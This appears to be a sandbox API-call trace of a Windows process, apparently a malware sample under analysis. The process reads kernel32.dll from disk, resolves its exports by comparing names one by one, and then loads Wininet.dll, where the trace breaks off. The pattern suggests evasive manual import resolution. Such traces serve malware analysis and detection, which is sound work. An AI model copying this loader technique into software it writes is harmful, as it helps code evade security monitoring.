[0136.653] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0136.653] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0136.794] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0136.794] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0136.794] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0136.794] GetProcessHeap () returned 0x520000 [0136.794] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xac430) returned 0x54cc90 [0136.796] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0136.796] ReadFile (in: hFile=0x134, lpBuffer=0x54cc90, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x54cc90*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0136.810] CloseHandle (hObject=0x134) returned 1 [0136.810] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0136.820] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0136.821] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0136.821] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0136.821] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0136.821] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0136.821] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0136.821] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0136.821] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0136.821] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0136.821] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0136.821] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0136.821] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0136.821] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0136.821] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0136.822] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0136.822] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0136.823] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0136.823] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0136.823] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0136.824] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0136.824] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0136.824] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.824] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.824] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0136.824] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0136.824] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0136.825] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0136.825] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0136.826] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0136.826] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0136.827] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0136.827] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0136.828] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0136.828] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.828] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0136.829] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0136.829] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0136.830] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0136.830] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0136.830] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0136.830] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0136.830] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0136.830] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0136.830] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0136.831] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0136.832] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0136.832] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0136.832] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0138.116] GetProcessHeap () returned 0x520000 [0138.116] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x54cc90 | out: hHeap=0x520000) returned 1 [0138.936] GetProcessHeap () returned 0x520000 [0138.936] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5396e0 [0138.937] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0138.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0138.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0138.947] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0138.947] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0138.948] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 